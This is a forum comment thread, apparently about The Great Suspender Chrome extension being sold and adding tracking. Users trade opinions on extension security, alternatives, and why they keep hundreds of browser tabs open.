Seems there should be an extension which checks other extensions for nefarious activity or notifies you of the events that are mentioned in the article.


The lack of user control, lock files, granularity of controls over browser extensions has gone too far.



Or you can use https://www.one-tab.com/ or https://tab.bz for a similar-ish use case


That's why I don't trust Chrome extensions. There have been too many instances of a popular instance being taken over to run malware. I don't think Google's handling of these security issues has been adequate.


Thanks for this! I've been using this extension for a long time and just removed it today. Honestly, with Macbook Air M1 there is no need for suspending tabs any more because the battery life is amazing, so that also helps.


Did anyone Download the latest good version of The Great Suspender (7.1.6) from GitHub and load it as an unpacked extension per the article?

Are there any potential downsides to this? I was also curious how does loading this format avoid updates?


At this point, I would gladly pay good money for a browser that prevented ads and tracking, provided most of the standard plugin functionality oob and vetted the rest. This whole mess is a massive time suck.


I'm using Brave. Not sure it exactly matches what you want, but it's the closest I've found.


I've been using Sidekick, it has done a lot for me in terms of substituting extensions like TGS. It has its own tool for tab grouping and sessions, plus adblock. It has been good for productivity.


Uh, just use Firefox. Problem solved for both functionality and security.


Looks like the 'last known good' version 7.1.6 is now blocked by the TGS server.

Workaround to reopen a page is just to cut'n'paste the original URL from a parameter at the end of the TGS URL.


It appears 'Back' may also work in restoring the page.


Uninstalled and reported.


Is there a tool which will automatically reload all your extensions from disk, as described in the OP? Seems like a sensible default, from a security perspective.


Is there a reason this extension still exists, given that tabs get heavily deprioritized when not in focus, and have been for many, many versions now?


Chrome throttles tab CPU activities when backgrounded, but doesn't clear memory for the tab. For users like me who usually have 50-800 tabs open across all my browser windows, that really adds up. I also appreciate (err... appreciated) The Great Suspender because I didn't want all of those tabs active every time I opened a browser, so I'd have scores of tabs that never even got loaded, but were ready to go the moment I wanted to return to them.


Chrome does discard the memory of tabs that haven't been used recently and Great Suspender can be configured to make use of that functionality.


They get throttled but still kept in memory. This drops them from memory.


I'm genuinely curious why that would matter: modern operating systems (heck, even not so modern ones) already move stale data from active memory to virtual memory in order to service active processes/threads, so if you're the kind of person who keeps hundreds of tabs open (and memory isn't the real problem if you do) then the OS is already keeping all that content on disk, not in memory...


I expected this to be about Jack Dorsey/twitter xD


I keep most of my extensions disabled most of the time. A lot of the extensions have particular uses and don't always need to be active.


I'm glad I decided to go with 32 GB of RAM for my current PC build. No longer need to close any tabs!


Why do people keep 100s of tabs open at a time? I get irritated if I have more than 8 open.


Why do people not understand why I have 100s of tabs open? I get irritated when asked this question.


Why indeed. Is that because bookmarks are too clumsy to use, and don't save your scroll position and other user input?


Any time I'm working on something, I inevitably end up with 20-30 tabs with different things I'm referencing. Especially documentation. I think I have around 6-8 open when I'm not doing anything, since I pin some web apps (e.g. Facebook Messenger) or dashboards.

It's also the best way to browse image galleries: middle click everything into new tabs, navigate them with the keyboard, and close them as you go. Beats clunky JavaScript lightboxes.


Tabs are my lazy man's to-do list. Leaving them open saves all the context I need. Closing them means I have to spend effort to get them back.


I'm a software developer and am always hovering around this mark. It's usually from digging through documentation, having multiple tabs with different areas of the app you're working on open, productivity tabs like Slack and Gmail, then personal tabs like Reddit and YouTube.


Try the extension 'Session Buddy'. You can view all open tabs and windows, group them as needed, and then save, close, and reopen sessions and groups.

I routinely research several related topics for a project, and I will need 10-30 tabs per topic open at once. Surprisingly, chrome manages to handle 100+ tabs on my system without issue.


I multitask. A lot. It's my job.

You should see my desktop


Because they have not found the bookmarks feature yet.


When I have 100 tabs open, 90 of them are one time use pages. I need to compile bits of information from each page, and then I never need those pages again. Why would I use bookmarks?

For example, last week I was shopping for a very specific, very expensive ceramic thrust bearing. I had 20+ pages open from 10+ suppliers and documentation sources. I needed those open all week while we decided on which one to buy. This was a minor background task, so I also had 60 other tabs open for my normal work flow.

Just because people use a tool differently than you doesn't make them wrong.


It'd be great if someone invented a method of working with bookmarks that worked as easily and seamlessly as tabs.

Back in the days of social bookmarks (like del.icio.us) pretty much everyone had a "toread" folder. The main problem is that you have to remember to delete them after reading them. That's not really a problem for good articles you remember reading, but the crap articles you don't remember, or quit reading are easy to forget to delete from the bookmarks. So, you end up reading the same crap articles several times. With a tab, you close the window and you're done. With bookmarks, you have to close the window, go through your bookmarks, find the one that was crap that you have already forgotten and delete it.

There's several other advantages to tabs too:

Like the fact that they're naturally organized by window based on the task you're doing.

You'll see them more often, and thus be reminded more often.

They save context, like forwards and back history, and information you may have typed in, or a UI you may have manipulated.


That brings me to the problem with links as well as with e-books: you don't usually see them. When you have an open tab, you see it all day long until you get rid of it. When you have a printed book, you bump in it on a daily basis (unless you hide it in more books).


Also bookmarks don't save page context. If I'm doing something -- even something simple like scrolling down a page -- and get interrupted, it's just easier to leave it open.


Yep. Tab history is important. How I got to some page is almost as important as the page itself.

I've been using large tab sessions ever since Opera 5 in the early 2000s. Back then I'd have 20-50 tabs or so. These days I have sessions of 500 active tabs and 500 suspended. It's great. I have full text tab search, and since my sessions last years, I know the general location of all important tabs. Also, since I use a single process browser and NoScript, all those 500+ tabs take under 3 GB of ram.

It's a matter of taste, but it's no new trend. Tabs, and tab users, have been around for 20 years now.



There's a reason why I don't install any extension except a password manager.


Does this extension add functionality beyond Chrome's existing tab suspension?


I just don't use extensions, so no need to worry about such scenarios.


Wow, my Chrome RAM usage went from about 2GB to 8GB after removing TGS.


Wow, this is why just recently my Macbook pro was registering high CPU usage even when all tabs were asleep using Great Suspender. For some reason, Chrome was registering high CPU usage, and I thought it was some Chrome bug.


You lost me. What's this "this" in "this is why", exactly?


Lifesaver. Much obliged, davidfstr.


anyone able to compare Tiny Suspender and Auto Tab Discard?


there really needs to be a better bookmarking solution.


Uninstalled. Period.


A reddit link, from the blog post [0] has all the details for those who don't use chrome.

TLDR: A popular extension was quietly sold off to an unknown party that subsequently added tracking/analytics. Not specifically malware, but not trustworthy either.

Did I miss anything?

[0]: https://www.reddit.com/r/KyleTaylor/comments/jowlt2/open_sou...


"Shady" take-over of plugins/apps is just as big a suspicious fail as allowing apps to gain access to all contacts on mobile phones.

Google never really cared about user privacy at all.



